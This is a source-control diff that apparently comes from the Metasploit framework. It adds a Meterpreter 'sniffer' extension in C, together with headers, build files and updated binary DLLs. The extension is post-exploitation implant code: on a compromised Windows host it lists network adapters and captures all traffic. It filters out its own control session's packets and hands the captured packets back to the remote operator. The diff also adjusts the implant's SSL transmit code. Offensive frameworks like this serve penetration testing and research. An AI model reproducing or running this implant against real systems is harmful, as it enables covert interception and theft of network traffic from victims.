diff --git a/data/meterpreter/ext_server_espia.dll b/data/meterpreter/ext_server_espia.dll index 99588ff2cd..322a3912d4 100644 Binary files a/data/meterpreter/ext_server_espia.dll and b/data/meterpreter/ext_server_espia.dll differ diff --git a/data/meterpreter/ext_server_incognito.dll b/data/meterpreter/ext_server_incognito.dll index ec2c3f5a94..bf54ed64ed 100755 Binary files a/data/meterpreter/ext_server_incognito.dll and b/data/meterpreter/ext_server_incognito.dll differ diff --git a/data/meterpreter/ext_server_priv.dll b/data/meterpreter/ext_server_priv.dll index aee75a73cb..2cd4ba85b3 100755 Binary files a/data/meterpreter/ext_server_priv.dll and b/data/meterpreter/ext_server_priv.dll differ diff --git a/data/meterpreter/ext_server_sniffer.dll b/data/meterpreter/ext_server_sniffer.dll index 9da2991e9c..e522f668e4 100644 Binary files a/data/meterpreter/ext_server_sniffer.dll and b/data/meterpreter/ext_server_sniffer.dll differ diff --git a/data/meterpreter/ext_server_stdapi.dll b/data/meterpreter/ext_server_stdapi.dll index c21ad49817..18e16aed6f 100755 Binary files a/data/meterpreter/ext_server_stdapi.dll and b/data/meterpreter/ext_server_stdapi.dll differ diff --git a/data/meterpreter/metcli.exe b/data/meterpreter/metcli.exe index 37a9a6a980..4a2874df71 100644 Binary files a/data/meterpreter/metcli.exe and b/data/meterpreter/metcli.exe differ diff --git a/data/meterpreter/metsrv.dll b/data/meterpreter/metsrv.dll index 824cd0d452..b22209efa8 100755 Binary files a/data/meterpreter/metsrv.dll and b/data/meterpreter/metsrv.dll differ diff --git a/external/source/meterpreter/source/common/common.h b/external/source/meterpreter/source/common/common.h index f27017745c..81e7dc0dfd 100644 --- a/external/source/meterpreter/source/common/common.h +++ b/external/source/meterpreter/source/common/common.h @@ -25,10 +25,6 @@ #include "channel.h" #include "scheduler.h" - - - - #ifdef DEBUGTRACE #define dprintf(...) real_dprintf(__VA_ARGS__) #else diff --git a/external/source/meterpreter/source/common/core.c b/external/source/meterpreter/source/common/core.c index e1de7805e1..bb44000cf7 100644 --- a/external/source/meterpreter/source/common/core.c +++ b/external/source/meterpreter/source/common/core.c @@ -711,7 +711,9 @@ DWORD packet_transmit(Remote *remote, Packet *packet, while( (res = ssl_write( &remote->ssl, (LPCSTR)(&packet->header) + idx, - sizeof(packet->header) - idx)) == POLARSSL_ERR_NET_TRY_AGAIN) { } + sizeof(packet->header) - idx)) == POLARSSL_ERR_NET_TRY_AGAIN) { + dprintf("resending SSL header data on blocked socket"); + } if(res < 0) { dprintf("transmit header failed with return %d at index %d\n", res, idx); break; @@ -726,7 +728,9 @@ DWORD packet_transmit(Remote *remote, Packet *packet, while( (res = ssl_write( &remote->ssl, packet->payload + idx, - packet->payloadLength - idx)) == POLARSSL_ERR_NET_TRY_AGAIN) { } + packet->payloadLength - idx)) == POLARSSL_ERR_NET_TRY_AGAIN) { + dprintf("resending SSL payload data on blocked socket"); + } idx += res; } diff --git a/external/source/meterpreter/source/extensions/sniffer/sniffer.c b/external/source/meterpreter/source/extensions/sniffer/sniffer.c new file mode 100644 index 0000000000..1799a38988 --- /dev/null +++ b/external/source/meterpreter/source/extensions/sniffer/sniffer.c @@ -0,0 +1,548 @@ +/* + * This module implements packet sniffing features + */ +#define _CRT_SECURE_NO_DEPRECATE 1 +#include "../../common/common.h" + +#include "sniffer.h" + +#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h" +// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function +// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the +// second stage reflective dll inject payload and not the metsrv itself when it loads extensions. +#include "../../ReflectiveDLLInjection/ReflectiveLoader.c" + +// this sets the delay load hook function, see DelayLoadMetSrv.h +EnableDelayLoadMetSrv(); + +HANDLE hMgr; +DWORD hErr; + +struct sockaddr peername; +int peername_len; + +struct sockaddr_in *peername4; +struct sockaddr_in6 *peername6; + +int sniffer_includeports[1024]; +int sniffer_excludeports[1024]; + +CRITICAL_SECTION sniffercs; + +#define SNIFFER_MAX_INTERFACES 128 +#define SNIFFER_MAX_QUEUE 210000 // ~300Mb @ 1514 bytes + +CaptureJob open_captures[SNIFFER_MAX_INTERFACES]; + +DWORD request_sniffer_interfaces(Remote *remote, Packet *packet); +DWORD request_sniffer_capture_start(Remote *remote, Packet *packet); +DWORD request_sniffer_capture_stop(Remote *remote, Packet *packet); +DWORD request_sniffer_capture_stats(Remote *remote, Packet *packet); +DWORD request_sniffer_capture_dump(Remote *remote, Packet *packet); +HANDLE pktsdk_interface_by_index(unsigned int fidx); +DWORD pktsdk_initialize(void); + +void __stdcall sniffer_queue_receive(DWORD_PTR Param, DWORD_PTR ThParam, HANDLE hPacket, LPVOID pPacketData, DWORD IncPacketSize); + + +#define check_pssdk(); if(!hMgr && pktsdk_initialize()!=0){packet_transmit_response(hErr, remote, response);return(hErr);} + +DWORD pktsdk_initialize(void) { + hMgr = MgrCreate(); + if(! hMgr){ + dprintf("sniffer>> failed to allocate a new Mgr object"); + hErr = ERROR_ACCESS_DENIED; + return(hErr); + } + + hErr = MgrInitialize(hMgr); + dprintf("sniffer>> Mgr object initialized with return %d (handle %d)", hErr, hMgr); + return hErr; +} + +HANDLE pktsdk_interface_by_index(unsigned int fidx) { + unsigned idx = 1; + HANDLE hCfg; + + dprintf("sniffer>> pktsdk_interface_by_index(%d)", fidx); + + hCfg = MgrGetFirstAdapterCfg(hMgr); + do { + if(fidx == idx++) return hCfg; + }while((hCfg = MgrGetNextAdapterCfg(hMgr,hCfg)) != NULL); + return NULL; +} + + +DWORD request_sniffer_interfaces(Remote *remote, Packet *packet) +{ + Packet *response = packet_create_response(packet); + Tlv entries[8]; + + /* + 0: Index + 1: Name + 2: Description + 3: Type + 4: MTU + 5: Wireless? + 6: Accessible? + 7: DHCP? + */ + unsigned int idx = 1; + HANDLE hCfg; + + check_pssdk(); + + hCfg = MgrGetFirstAdapterCfg(hMgr); + + do + { + unsigned char *aname = (unsigned char *)AdpCfgGetAdapterNameA(hCfg); + unsigned char *adesc = (unsigned char *)AdpCfgGetAdapterDescriptionA(hCfg); + unsigned int ahand = htonl((unsigned int)hCfg); + unsigned int atype = htonl(AdpCfgGetAdapterType(hCfg)); + unsigned int amtu = htonl(AdpCfgGetMaxPacketSize(hCfg)); + unsigned int aidx = htonl(idx); + + BOOL awireless = AdpCfgIsWireless(hCfg); + BOOL ausable = AdpCfgGetAccessibleState(hCfg); + BOOL adhcp = AdpCfgGetDhcpState(hCfg); + + memset(entries, 0, sizeof(entries)); + + dprintf("sniffer>> interface %d - %s - %s", idx, aname, adesc); + + entries[0].header.type = TLV_TYPE_UINT; + entries[0].header.length = sizeof(unsigned int); + entries[0].buffer = (PUCHAR)&aidx; + + entries[1].header.type = TLV_TYPE_STRING; + entries[1].header.length = strlen(aname)+1; + entries[1].buffer = aname; + + entries[2].header.type = TLV_TYPE_STRING; + entries[2].header.length = strlen(adesc)+1; + entries[2].buffer = adesc; + + entries[3].header.type = TLV_TYPE_UINT; + entries[3].header.length = sizeof(unsigned int); + entries[3].buffer = (PUCHAR)&atype; + + entries[4].header.type = TLV_TYPE_UINT; + entries[4].header.length = sizeof(unsigned int); + entries[4].buffer = (PUCHAR)&amtu; + + entries[5].header.type = TLV_TYPE_BOOL; + entries[5].header.length = sizeof(BOOL); + entries[5].buffer = (PUCHAR)&awireless; + + entries[6].header.type = TLV_TYPE_BOOL; + entries[6].header.length = sizeof(BOOL); + entries[6].buffer = (PUCHAR)&ausable; + + entries[7].header.type = TLV_TYPE_BOOL; + entries[7].header.length = sizeof(BOOL); + entries[7].buffer = (PUCHAR)&adhcp; + + packet_add_tlv_group(response, TLV_TYPE_SNIFFER_INTERFACES, entries, 8); + + idx++; + }while((hCfg = MgrGetNextAdapterCfg(hMgr,hCfg)) != NULL); + + packet_transmit_response(ERROR_SUCCESS, remote, response); + return ERROR_SUCCESS; +} + + + +void __stdcall sniffer_receive(DWORD_PTR Param, DWORD_PTR ThParam, HANDLE hPacket, LPVOID pPacketData, DWORD IncPacketSize) { + CaptureJob *j; + HANDLE pkt; + unsigned char *pktbuf; + unsigned char *pktmax; + ETHERNET_HEADER *eth; + IP_HEADER *ip; + TCP_HEADER *tcp; + UDP_HEADER *udp; + + + j = (CaptureJob *)Param; + pktbuf = (unsigned char *)pPacketData; + pktmax = pktbuf + IncPacketSize; + + + // Only process active jobs + if(!j->active) return; + + // Traffic filtering goes here + do { + // Skip matching on short packets + if(IncPacketSize < sizeof(ETHERNET_HEADER)+sizeof(IP_HEADER)+sizeof(TCP_HEADER)){ + dprintf("sniffer>> skipping exclusion because the packet is too small"); + } + + // Match IP packets + if(! peername4) { + dprintf("sniffer>> skipping exclusion because peername4 is not defined"); + break; + } + + // Skip non-IP packets + eth = (ETHERNET_HEADER *) pktbuf; + if(ntohs(eth->EthType) != ETHERTYPE_IP) { + dprintf("sniffer>> skipping non-IP packet from filter"); + break; + } + + // Skip non-TCP/UDP packets + ip = (IP_HEADER *)&pktbuf[sizeof(ETHERNET_HEADER)]; + if(ip->Protocol != IPPROTO_TCP && ip->Protocol != IPPROTO_UDP) { + dprintf("sniffer>> skipping non-TCP/UDP packet from filter: %d", ip->Protocol); + break; + } + + if(ip->Protocol == IPPROTO_TCP) { + tcp = (TCP_HEADER *)&pktbuf[sizeof(ETHERNET_HEADER) + (ip->Len * 4)]; + if( (unsigned char *)tcp + sizeof(TCP_HEADER) > pktmax) { + dprintf("sniffer>> TCP packet is too short"); + break; + } + + // Ignore our own control session's traffic + if ( (memcmp(&ip->SrcAddr, &peername4->sin_addr, 4) == 0 && tcp->Sport == peername4->sin_port) || + (memcmp(&ip->DestAddr, &peername4->sin_addr, 4) == 0 && tcp->Dport == peername4->sin_port) ) { + return; + } + // TODO: Scan through a list of included/excluded ports + } + + // All done matching exclusions + } while(0); + + + // Thread-synchronized access to the queue + EnterCriticalSection(&sniffercs); + + if(j->idx_pkts >= j->max_pkts) j->idx_pkts = 0; + j->cur_pkts++; + j->cur_bytes += IncPacketSize; + + pkt = PktCreate(j->mtu); + PktCopyPacketToPacket(pkt, hPacket); + if(j->pkts[j->idx_pkts]) + PktDestroy(j->pkts[j->idx_pkts]); + j->pkts[j->idx_pkts] = pkt; + j->idx_pkts++; + + LeaveCriticalSection(&sniffercs); +} + +DWORD request_sniffer_capture_start(Remote *remote, Packet *packet) { + Packet *response = packet_create_response(packet); + unsigned int ifid; + unsigned int maxp; + CaptureJob *j; + DWORD result; + HANDLE ifh; + + check_pssdk(); + dprintf("sniffer>> start_capture()"); + + ifid = packet_get_tlv_value_uint(packet,TLV_TYPE_SNIFFER_INTERFACE_ID); + maxp = packet_get_tlv_value_uint(packet,TLV_TYPE_SNIFFER_PACKET_COUNT); + maxp = min(maxp, 200000); + maxp = max(maxp, 1); + + result = ERROR_SUCCESS; + + do { + // the interface is invalid + if(ifid == 0 || ifid >= SNIFFER_MAX_INTERFACES) { + result = ERROR_INVALID_PARAMETER; + break; + } + + ifh = pktsdk_interface_by_index(ifid); + if(ifh == NULL) { + result = ERROR_INVALID_PARAMETER; + break; + } + + j = &open_captures[ifid]; + + // the interface is already being captured + if(j->active) { + result = ERROR_INVALID_PARAMETER; + break; + } + + j->adp = AdpCreate(); + dprintf("sniffer>> capture_start() AdpCreate: 0x%.8x", j->adp); + + AdpSetConfig(j->adp,ifh); + hErr = AdpOpenAdapter(j->adp); + dprintf("sniffer>> capture_start() AdpOpenAdapter: 0x%.8x", hErr); + if (hErr != HNERR_OK) { + AdpDestroy(j->adp); + result = hErr; + break; + } + + j->pkts = calloc(maxp, sizeof(HANDLE)); + if(j->pkts == NULL) { + AdpCloseAdapter(j->adp); + AdpDestroy(j->adp); + result = ERROR_ACCESS_DENIED; + break; + } + + j->active = 1; + j->intf = ifid; + j->max_pkts = maxp; + j->cur_pkts = 0; + j->mtu = AdpCfgGetMaxPacketSize(AdpGetConfig(j->adp)); + + AdpSetOnPacketRecv(j->adp, (FARPROC) sniffer_receive, (DWORD_PTR)j); + AdpSetMacFilter(j->adp, mfAll); + } while(0); + + packet_transmit_response(result, remote, response); + return ERROR_SUCCESS; +} + +DWORD request_sniffer_capture_stop(Remote *remote, Packet *packet) { + Packet *response = packet_create_response(packet); + unsigned int ifid; + CaptureJob *j; + DWORD result; + + check_pssdk(); + dprintf("sniffer>> stop_capture()"); + + ifid = packet_get_tlv_value_uint(packet,TLV_TYPE_SNIFFER_INTERFACE_ID); + dprintf("sniffer>> stop_capture(0x%.8x)", ifid); + + result = ERROR_SUCCESS; + + do { + // the interface is invalid + if(ifid == 0 || ifid >= SNIFFER_MAX_INTERFACES) { + result = ERROR_INVALID_PARAMETER; + break; + } + + j = &open_captures[ifid]; + + // the interface is not being captured + if(! j->adp) { + result = ERROR_INVALID_PARAMETER; + break; + } + + j->active = 0; + AdpCloseAdapter(j->adp); + AdpDestroy(j->adp); + free(j->pkts); + memset(j, 0, sizeof(CaptureJob)); + + dprintf("sniffer>> stop_capture() interface %d processed %d packets/%d bytes", j->intf, j->cur_pkts, j->cur_bytes); + } while(0); + + packet_transmit_response(result, remote, response); + return ERROR_SUCCESS; +} + + + +DWORD request_sniffer_capture_stats(Remote *remote, Packet *packet) { + Packet *response = packet_create_response(packet); + unsigned int ifid; + CaptureJob *j; + DWORD result; + + check_pssdk(); + dprintf("sniffer>> capture_stats()"); + + ifid = packet_get_tlv_value_uint(packet,TLV_TYPE_SNIFFER_INTERFACE_ID); + dprintf("sniffer>> capture_stats(0x%.8x)", ifid); + + result = ERROR_SUCCESS; + + do { + // the interface is invalid + if(ifid == 0 || ifid >= SNIFFER_MAX_INTERFACES) { + result = ERROR_INVALID_PARAMETER; + break; + } + + j = &open_captures[ifid]; + + // the interface was not captured + if(! j->adp) { + result = ERROR_INVALID_PARAMETER; + break; + } + + packet_add_tlv_uint(response, TLV_TYPE_SNIFFER_PACKET_COUNT, j->cur_pkts); + packet_add_tlv_uint(response, TLV_TYPE_SNIFFER_BYTE_COUNT, (unsigned int) j->cur_bytes); + } while(0); + + packet_transmit_response(result, remote, response); + return ERROR_SUCCESS; +} + + +DWORD request_sniffer_capture_dump(Remote *remote, Packet *packet) { + Packet *response = packet_create_response(packet); + unsigned int ifid; + CaptureJob *j; + DWORD result,pcnt,bcnt,rcnt,i; + DWORD thi, tlo; + + check_pssdk(); + dprintf("sniffer>> capture_dump()"); + + ifid = packet_get_tlv_value_uint(packet,TLV_TYPE_SNIFFER_INTERFACE_ID); + dprintf("sniffer>> capture_dump(0x%.8x)", ifid); + + result = ERROR_SUCCESS; + + do { + // the interface is invalid + if(ifid == 0 || ifid >= SNIFFER_MAX_INTERFACES) { + result = ERROR_INVALID_PARAMETER; + break; + } + + j = &open_captures[ifid]; + + // the interface was not captured + if(! j->adp) { + result = ERROR_INVALID_PARAMETER; + break; + } + + EnterCriticalSection(&sniffercs); + + bcnt = j->cur_bytes; + pcnt = j->cur_pkts; + rcnt = 0; + + packet_add_tlv_uint(response, TLV_TYPE_SNIFFER_PACKET_COUNT, pcnt); + packet_add_tlv_uint(response, TLV_TYPE_SNIFFER_BYTE_COUNT, bcnt); + + for(i=0; imax_pkts; i++) { + if(!j->pkts[i]) break; + tlo = PktGetTimeStamp(j->pkts[i], &thi); + packet_add_tlv_uint(response, TLV_TYPE_UINT, PktGetId(j->pkts[i], NULL)); + packet_add_tlv_uint(response, TLV_TYPE_UINT, thi); + packet_add_tlv_uint(response, TLV_TYPE_UINT, tlo); + packet_add_tlv_raw( + response, + TLV_TYPE_SNIFFER_PACKET, + PktGetPacketData(j->pkts[i]), + PktGetPacketSize(j->pkts[i]) + ); + PktDestroy(j->pkts[i]); + j->pkts[i] = NULL; + } + dprintf("sniffer>> finished processing packets"); + + j->cur_bytes = 0; + j->cur_pkts = 0; + j->idx_pkts = 0; + + LeaveCriticalSection(&sniffercs); + + } while(0); + + packet_transmit_response(result, remote, response); + return ERROR_SUCCESS; +} + +Command customCommands[] = +{ + // List interfaces + { "sniffer_interfaces", + { request_sniffer_interfaces, { 0 }, 0 }, + { EMPTY_DISPATCH_HANDLER }, + }, + // Start sniffing + { "sniffer_capture_start", + { request_sniffer_capture_start, { 0 }, 0 }, + { EMPTY_DISPATCH_HANDLER }, + }, + // Stop sniffing + { "sniffer_capture_stop", + { request_sniffer_capture_stop, { 0 }, 0 }, + { EMPTY_DISPATCH_HANDLER }, + }, + // Sniffing stats + { "sniffer_capture_stats", + { request_sniffer_capture_stats, { 0 }, 0 }, + { EMPTY_DISPATCH_HANDLER }, + }, + // Sniffing dump + { "sniffer_capture_dump", + { request_sniffer_capture_dump, { 0 }, 0 }, + { EMPTY_DISPATCH_HANDLER }, + }, + // Terminator + { NULL, + { EMPTY_DISPATCH_HANDLER }, + { EMPTY_DISPATCH_HANDLER }, + } +}; + +/* + * Initialize the server extension + */ +DWORD __declspec(dllexport) InitServerExtension(Remote *remote) +{ + DWORD index; + + hMetSrv = remote->hMetSrv; + + for (index = 0; + customCommands[index].method; + index++) + command_register(&customCommands[index]); + + // initialize structures for the packet sniffer sdk + hMgr = NULL; + hErr = 0; + memset(open_captures, 0, sizeof(open_captures)); + + // wipe the include/exclude ports empty + memset(sniffer_includeports, 0, sizeof(sniffer_includeports)); + memset(sniffer_excludeports, 0, sizeof(sniffer_excludeports)); + sniffer_includeports[0] = -1; + sniffer_excludeports[0] = -1; + + // get the address/port of the connected control socket + peername4 = NULL; + peername6 = NULL; + peername_len = sizeof(peername); + getpeername(remote->fd, &peername, &peername_len); + if(peername.sa_family == PF_INET) peername4 = (struct sockaddr_in *)&peername; + if(peername.sa_family == PF_INET6) peername6 = (struct sockaddr_in6 *)&peername; + + InitializeCriticalSection(&sniffercs); + return hErr; +} + +/* + * Deinitialize the server extension + */ +DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote) +{ + DWORD index; + + for (index = 0; + customCommands[index].method; + index++) + command_deregister(&customCommands[index]); + MgrDestroy(hMgr); + return ERROR_SUCCESS; +} diff --git a/external/source/meterpreter/source/extensions/sniffer/sniffer.h b/external/source/meterpreter/source/extensions/sniffer/sniffer.h new file mode 100644 index 0000000000..991c5bb577 --- /dev/null +++ b/external/source/meterpreter/source/extensions/sniffer/sniffer.h @@ -0,0 +1,85 @@ +#ifndef _METERPRETER_SOURCE_EXTENSION_SNIFFER_SNIFFER_H +#define _METERPRETER_SOURCE_EXTENSION_SNIFFER_SNIFFER_H + + +#include +#include + +#include "HNPsSdkUser.h" +#include "ethernet.h" +#include "ip.h" +#include "tcp.h" +#include "udp.h" + + +typedef struct capturejob +{ + unsigned int active; + unsigned int intf; + unsigned int max_pkts; + unsigned int idx_pkts; + unsigned int cur_pkts; + unsigned int cur_bytes; + unsigned int mtu; + HANDLE adp; + HANDLE *pkts; +} CaptureJob; + +#define TLV_TYPE_EXTENSION_SNIFFER 0 + + +#define TLV_TYPE_SNIFFER_INTERFACES \ + MAKE_CUSTOM_TLV( \ + TLV_META_TYPE_GROUP, \ + TLV_TYPE_EXTENSION_SNIFFER, \ + TLV_EXTENSIONS + 1) + +#define TLV_TYPE_SNIFFER_INTERFACE_ID \ + MAKE_CUSTOM_TLV( \ + TLV_META_TYPE_UINT, \ + TLV_TYPE_EXTENSION_SNIFFER, \ + TLV_EXTENSIONS + 2) + +#define TLV_TYPE_SNIFFER_INTERFACE_HANDLE \ + MAKE_CUSTOM_TLV( \ + TLV_META_TYPE_UINT, \ + TLV_TYPE_EXTENSION_SNIFFER, \ + TLV_EXTENSIONS + 3) + +#define TLV_TYPE_SNIFFER_PACKET_COUNT \ + MAKE_CUSTOM_TLV( \ + TLV_META_TYPE_UINT, \ + TLV_TYPE_EXTENSION_SNIFFER, \ + TLV_EXTENSIONS + 4) + +#define TLV_TYPE_SNIFFER_BYTE_COUNT \ + MAKE_CUSTOM_TLV( \ + TLV_META_TYPE_UINT, \ + TLV_TYPE_EXTENSION_SNIFFER, \ + TLV_EXTENSIONS + 5) + +#define TLV_TYPE_SNIFFER_EXCLUDE_PORTS \ + MAKE_CUSTOM_TLV( \ + TLV_META_TYPE_GROUP, \ + TLV_TYPE_EXTENSION_SNIFFER, \ + TLV_EXTENSIONS + 6) + +#define TLV_TYPE_SNIFFER_INCLUDE_PORTS \ + MAKE_CUSTOM_TLV( \ + TLV_META_TYPE_GROUP, \ + TLV_TYPE_EXTENSION_SNIFFER, \ + TLV_EXTENSIONS + 7) + +#define TLV_TYPE_SNIFFER_PACKETS \ + MAKE_CUSTOM_TLV( \ + TLV_META_TYPE_GROUP, \ + TLV_TYPE_EXTENSION_SNIFFER, \ + TLV_EXTENSIONS + 8) + +#define TLV_TYPE_SNIFFER_PACKET \ + MAKE_CUSTOM_TLV( \ + TLV_META_TYPE_RAW, \ + TLV_TYPE_EXTENSION_SNIFFER, \ + TLV_EXTENSIONS + 9) + +#endif diff --git a/external/source/meterpreter/source/server/metsrv.c b/external/source/meterpreter/source/server/metsrv.c index 980561af3e..445c9bcae7 100644 --- a/external/source/meterpreter/source/server/metsrv.c +++ b/external/source/meterpreter/source/server/metsrv.c @@ -38,7 +38,7 @@ DWORD __declspec(dllexport) Init(SOCKET fd) if( hAppInstance == NULL ) hAppInstance = GetModuleHandle( NULL ); - srand(time(NULL)); + srand((unsigned int)time(NULL)); __try { @@ -145,7 +145,7 @@ DWORD negotiate_ssl(Remote *remote) ssl_set_authmode( ssl, SSL_VERIFY_NONE ); ssl_set_dbg( ssl, ssl_debug_log, NULL); ssl_set_rng( ssl, havege_rand, &hs ); - ssl_set_bio( ssl, net_recv, &fd, net_send, &fd ); + ssl_set_bio( ssl, net_recv, &remote->fd, net_send, &remote->fd ); ssl_set_ciphers( ssl, ssl_default_ciphers ); ssl_set_session( ssl, 0, 0, ssn ); diff --git a/external/source/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcproj b/external/source/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcproj new file mode 100644 index 0000000000..dc9871278b --- /dev/null +++ b/external/source/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcproj @@ -0,0 +1,211 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/external/source/meterpreter/workspace/meterpreter.sln b/external/source/meterpreter/workspace/meterpreter.sln index acde5c48ca..9fb82bacb8 100644 --- a/external/source/meterpreter/workspace/meterpreter.sln +++ b/external/source/meterpreter/workspace/meterpreter.sln @@ -50,6 +50,12 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_espia", "ext_ser {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} EndProjectSection EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_sniffer", "ext_server_sniffer\ext_server_sniffer.vcproj", "{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}" + ProjectSection(ProjectDependencies) = postProject + {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D} + {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} + EndProjectSection +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Win32 = Debug|Win32 @@ -92,6 +98,10 @@ Global {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|Win32.Build.0 = Debug|Win32 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|Win32.ActiveCfg = Release|Win32 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|Win32.Build.0 = Release|Win32 + {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Debug|Win32.ActiveCfg = Debug|Win32 + {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Debug|Win32.Build.0 = Debug|Win32 + {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Release|Win32.ActiveCfg = Release|Win32 + {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Release|Win32.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE